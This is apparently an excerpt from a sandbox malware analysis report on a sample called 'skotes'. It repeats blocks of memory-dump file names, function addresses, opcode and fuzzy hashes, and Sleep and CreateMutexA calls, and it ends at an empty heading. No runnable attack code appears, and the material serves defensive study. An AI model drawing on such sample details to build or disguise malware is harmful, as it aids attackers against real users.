Associated: 00000002.00000002.2117571687.00000000004F3000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2117591079.00000000004F4000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2117608575.00000000004FC000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2117628670.0000000000501000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2117648246.0000000000509000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2117668026.000000000050A000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2117686177.000000000050B000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2117705127.0000000000513000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2117705127.000000000054E000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2117764474.000000000057F000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2117782742.0000000000580000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2117801225.0000000000589000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2117821652.0000000000596000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2117841158.0000000000597000.00000080.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_280000_skotes.jbxd

Yara matches

Similarity

API ID: CreateMutexSleep
String ID: T2.
API String ID: 1464230837-2773616320
Opcode ID: bbf367f5c055b856d0c385f342a4797856cb056137c1924aef36444ef732daf7
Instruction ID: 8d5d153e9d2f5daa9e8d7f83daa5e02f7766e16b8f6a7384a6bda20334aaa008
Opcode Fuzzy Hash: bbf367f5c055b856d0c385f342a4797856cb056137c1924aef36444ef732daf7
Instruction Fuzzy Hash: BD319B31A252019BFB18EF78EDCDB6DB776EB86310F24821AF404973D4DB3559A08712

Function 0028A418 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 133
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00000064), ref: 0028A963
CreateMutexA.KERNELBASE(00000000,00000000,002E3254), ref: 0028A981

Strings

T2., xrefs: 0028A970

Memory Dump Source

Source File: 00000002.00000002.2117074619.0000000000281000.00000040.00000001.01000000.00000008.sdmp, Offset: 00280000, based on PE: true

Associated: 00000002.00000002.2117054149.0000000000280000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2117074619.00000000002E2000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2117142714.00000000002E9000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2117161354.00000000002EB000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2117180396.00000000002F7000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2117275274.000000000044F000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2117288750.0000000000452000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2117304465.0000000000468000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2117304465.0000000000473000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2117338736.00000000004A3000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2117362180.00000000004A5000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2117380082.00000000004AC000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2117399127.00000000004B6000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2117421062.00000000004CD000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2117438250.00000000004CE000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2117455069.00000000004CF000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2117473000.00000000004D7000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2117491406.00000000004E0000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2117514422.00000000004E7000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2117534358.00000000004E8000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2117553280.00000000004EA000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2117571687.00000000004F3000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2117591079.00000000004F4000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2117608575.00000000004FC000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2117628670.0000000000501000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2117648246.0000000000509000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2117668026.000000000050A000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2117686177.000000000050B000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2117705127.0000000000513000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2117705127.000000000054E000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2117764474.000000000057F000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2117782742.0000000000580000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2117801225.0000000000589000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2117821652.0000000000596000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2117841158.0000000000597000.00000080.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_280000_skotes.jbxd

Yara matches

Similarity

API ID: CreateMutexSleep
String ID: T2.
API String ID: 1464230837-2773616320
Opcode ID: 241a1606ab9a5dc593224e7d047a43ae5ec9a912ca65348923ce09c60149bbbc
Instruction ID: 58214dc88e40f54927cbd45f4f40129a6ce372f288b46759dec5d42a9e888ee7
Opcode Fuzzy Hash: 241a1606ab9a5dc593224e7d047a43ae5ec9a912ca65348923ce09c60149bbbc
Instruction Fuzzy Hash: A3316A31A251009BFF08EBB8E98DB6DB766DF81314F24421AF0149B2C5DBB559A08752

Function 0028A54D Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 132
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00000064), ref: 0028A963
CreateMutexA.KERNELBASE(00000000,00000000,002E3254), ref: 0028A981

Strings

T2., xrefs: 0028A970

Memory Dump Source

Source File: 00000002.00000002.2117074619.0000000000281000.00000040.00000001.01000000.00000008.sdmp, Offset: 00280000, based on PE: true

Associated: 00000002.00000002.2117054149.0000000000280000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2117074619.00000000002E2000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2117142714.00000000002E9000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2117161354.00000000002EB000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2117180396.00000000002F7000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2117275274.000000000044F000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2117288750.0000000000452000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2117304465.0000000000468000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2117304465.0000000000473000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2117338736.00000000004A3000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2117362180.00000000004A5000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2117380082.00000000004AC000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2117399127.00000000004B6000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2117421062.00000000004CD000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2117438250.00000000004CE000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2117455069.00000000004CF000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2117473000.00000000004D7000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2117491406.00000000004E0000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2117514422.00000000004E7000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2117534358.00000000004E8000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2117553280.00000000004EA000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2117571687.00000000004F3000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2117591079.00000000004F4000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2117608575.00000000004FC000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2117628670.0000000000501000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2117648246.0000000000509000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2117668026.000000000050A000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2117686177.000000000050B000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2117705127.0000000000513000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2117705127.000000000054E000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2117764474.000000000057F000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2117782742.0000000000580000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2117801225.0000000000589000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2117821652.0000000000596000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2117841158.0000000000597000.00000080.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_280000_skotes.jbxd

Yara matches

Similarity

API ID: CreateMutexSleep
String ID: T2.
API String ID: 1464230837-2773616320
Opcode ID: e8b564d776140b7176b26ed72c1239d2caf6c0031c8a257bb8fbdc615135aa54
Instruction ID: 090fa6ee11d67154a1add1806974348b732bb85e2bacc5acf3a3864d4cfa3b8e
Opcode Fuzzy Hash: e8b564d776140b7176b26ed72c1239d2caf6c0031c8a257bb8fbdc615135aa54
Instruction Fuzzy Hash: E0316E31A261009BFB08EB78DDC9B6CB765EB81315F64821AF414972D5DF399DA08712

Function 0028A682 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 131
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00000064), ref: 0028A963
CreateMutexA.KERNELBASE(00000000,00000000,002E3254), ref: 0028A981

Strings

T2., xrefs: 0028A970

Memory Dump Source

Source File: 00000002.00000002.2117074619.0000000000281000.00000040.00000001.01000000.00000008.sdmp, Offset: 00280000, based on PE: true

Associated: 00000002.00000002.2117054149.0000000000280000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2117074619.00000000002E2000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2117142714.00000000002E9000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2117161354.00000000002EB000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2117180396.00000000002F7000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2117275274.000000000044F000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2117288750.0000000000452000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2117304465.0000000000468000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2117304465.0000000000473000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2117338736.00000000004A3000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2117362180.00000000004A5000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2117380082.00000000004AC000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2117399127.00000000004B6000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2117421062.00000000004CD000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2117438250.00000000004CE000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2117455069.00000000004CF000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2117473000.00000000004D7000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2117491406.00000000004E0000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2117514422.00000000004E7000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2117534358.00000000004E8000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2117553280.00000000004EA000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2117571687.00000000004F3000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2117591079.00000000004F4000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2117608575.00000000004FC000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2117628670.0000000000501000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2117648246.0000000000509000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2117668026.000000000050A000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2117686177.000000000050B000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2117705127.0000000000513000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2117705127.000000000054E000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2117764474.000000000057F000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2117782742.0000000000580000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2117801225.0000000000589000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2117821652.0000000000596000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2117841158.0000000000597000.00000080.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_280000_skotes.jbxd

Yara matches

Similarity

API ID: CreateMutexSleep
String ID: T2.
API String ID: 1464230837-2773616320
Opcode ID: 9a1a45e4e3a201b14137a72d6ef71a441078fc83344ef6f2306396b2a2e13acb
Instruction ID: 00b9f84d01a0024474083aaac3132b6c7802fce3e13061f8aabef30e1ee709c1
Opcode Fuzzy Hash: 9a1a45e4e3a201b14137a72d6ef71a441078fc83344ef6f2306396b2a2e13acb
Instruction Fuzzy Hash: 7A317B35A262009BFF08EB78DD89B6DF776EB81310F24821AF014972D5DB3599A08752

Function 00289ADC Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 107
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00000064), ref: 0028A963
CreateMutexA.KERNELBASE(00000000,00000000,002E3254), ref: 0028A981

Strings

T2., xrefs: 0028A970

Memory Dump Source

Source File: 00000002.00000002.2117074619.0000000000281000.00000040.00000001.01000000.00000008.sdmp, Offset: 00280000, based on PE: true

Associated: 00000002.00000002.2117054149.0000000000280000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2117074619.00000000002E2000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2117142714.00000000002E9000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2117161354.00000000002EB000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2117180396.00000000002F7000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2117275274.000000000044F000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2117288750.0000000000452000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2117304465.0000000000468000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2117304465.0000000000473000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2117338736.00000000004A3000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2117362180.00000000004A5000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2117380082.00000000004AC000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2117399127.00000000004B6000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2117421062.00000000004CD000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2117438250.00000000004CE000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2117455069.00000000004CF000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2117473000.00000000004D7000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2117491406.00000000004E0000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2117514422.00000000004E7000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2117534358.00000000004E8000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2117553280.00000000004EA000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2117571687.00000000004F3000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2117591079.00000000004F4000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2117608575.00000000004FC000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2117628670.0000000000501000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2117648246.0000000000509000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2117668026.000000000050A000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2117686177.000000000050B000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2117705127.0000000000513000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2117705127.000000000054E000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2117764474.000000000057F000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2117782742.0000000000580000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2117801225.0000000000589000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2117821652.0000000000596000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2117841158.0000000000597000.00000080.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_280000_skotes.jbxd

Yara matches

Similarity

API ID: CreateMutexSleep
String ID: T2.
API String ID: 1464230837-2773616320
Opcode ID: e0575056c837dfed3070f1293b28bda9cea672a45919f46f5ee1c4d86a6b1b0b
Instruction ID: 61fc825225275ec0a31a8bfca7a6157f8ed3fb15a7d453aa37b023cca484c17c
Opcode Fuzzy Hash: e0575056c837dfed3070f1293b28bda9cea672a45919f46f5ee1c4d86a6b1b0b
Instruction Fuzzy Hash: DC216732A292019BFB18AF78ECC9B2CB766EBC1311F24421AF408872D5DB7559A08712

Function 0028A856 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00000064), ref: 0028A963
CreateMutexA.KERNELBASE(00000000,00000000,002E3254), ref: 0028A981

Strings

T2., xrefs: 0028A970

Memory Dump Source

Source File: 00000002.00000002.2117074619.0000000000281000.00000040.00000001.01000000.00000008.sdmp, Offset: 00280000, based on PE: true

Associated: 00000002.00000002.2117054149.0000000000280000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2117074619.00000000002E2000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2117142714.00000000002E9000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2117161354.00000000002EB000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2117180396.00000000002F7000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2117275274.000000000044F000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2117288750.0000000000452000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2117304465.0000000000468000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2117304465.0000000000473000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2117338736.00000000004A3000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2117362180.00000000004A5000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2117380082.00000000004AC000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2117399127.00000000004B6000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2117421062.00000000004CD000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2117438250.00000000004CE000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2117455069.00000000004CF000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2117473000.00000000004D7000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2117491406.00000000004E0000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2117514422.00000000004E7000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2117534358.00000000004E8000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2117553280.00000000004EA000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2117571687.00000000004F3000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2117591079.00000000004F4000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2117608575.00000000004FC000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2117628670.0000000000501000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2117648246.0000000000509000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2117668026.000000000050A000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2117686177.000000000050B000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2117705127.0000000000513000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2117705127.000000000054E000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2117764474.000000000057F000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2117782742.0000000000580000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2117801225.0000000000589000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2117821652.0000000000596000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2117841158.0000000000597000.00000080.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_280000_skotes.jbxd

Yara matches

Similarity

API ID: CreateMutexSleep
String ID: T2.
API String ID: 1464230837-2773616320
Opcode ID: a0a4b5a66dc94a8699838d2dc43cfabb01d93b98fce770eb94e9c9641f8e7bcc
Instruction ID: 75353f1df516aecfeb0b76397fd176e7f62e267a401675b7dbc21dac0dfaa24a
Opcode Fuzzy Hash: a0a4b5a66dc94a8699838d2dc43cfabb01d93b98fce770eb94e9c9641f8e7bcc
Instruction Fuzzy Hash: 80214B3567B2029AFB247BB8989AB2DB2529F81300F284417F544962C1DF7598B18763

Function 0028A34F Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00000064), ref: 0028A963
CreateMutexA.KERNELBASE(00000000,00000000,002E3254), ref: 0028A981

Strings

T2., xrefs: 0028A970

Memory Dump Source

Source File: 00000002.00000002.2117074619.0000000000281000.00000040.00000001.01000000.00000008.sdmp, Offset: 00280000, based on PE: true

Associated: 00000002.00000002.2117054149.0000000000280000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2117074619.00000000002E2000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2117142714.00000000002E9000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2117161354.00000000002EB000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2117180396.00000000002F7000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2117275274.000000000044F000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2117288750.0000000000452000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2117304465.0000000000468000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2117304465.0000000000473000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2117338736.00000000004A3000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2117362180.00000000004A5000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2117380082.00000000004AC000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2117399127.00000000004B6000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2117421062.00000000004CD000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2117438250.00000000004CE000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2117455069.00000000004CF000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2117473000.00000000004D7000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2117491406.00000000004E0000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2117514422.00000000004E7000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2117534358.00000000004E8000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2117553280.00000000004EA000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2117571687.00000000004F3000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2117591079.00000000004F4000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2117608575.00000000004FC000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2117628670.0000000000501000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2117648246.0000000000509000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2117668026.000000000050A000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2117686177.000000000050B000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2117705127.0000000000513000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2117705127.000000000054E000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2117764474.000000000057F000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2117782742.0000000000580000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2117801225.0000000000589000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2117821652.0000000000596000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2117841158.0000000000597000.00000080.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_280000_skotes.jbxd

Yara matches

Similarity

API ID: CreateMutexSleep
String ID: T2.
API String ID: 1464230837-2773616320
Opcode ID: c160804c840b2dcca099d941998752d727129f3a804a268e7f1d209bbfe5bb08
Instruction ID: 21e35ba764d5850501a0d336f6f30328930286bd2ea9a2ff24a60a84f5a49927
Opcode Fuzzy Hash: c160804c840b2dcca099d941998752d727129f3a804a268e7f1d209bbfe5bb08
Instruction Fuzzy Hash: E02179326692019BFB08EF78EC89B6CB766DBC1311F24425AF408D76D4DB7569A08712

Non-executed Functions

Function 00282EC0 Relevance: 10.8, APIs: 7, Instructions: 272threadCOMMON

Download Yara Rule

APIs
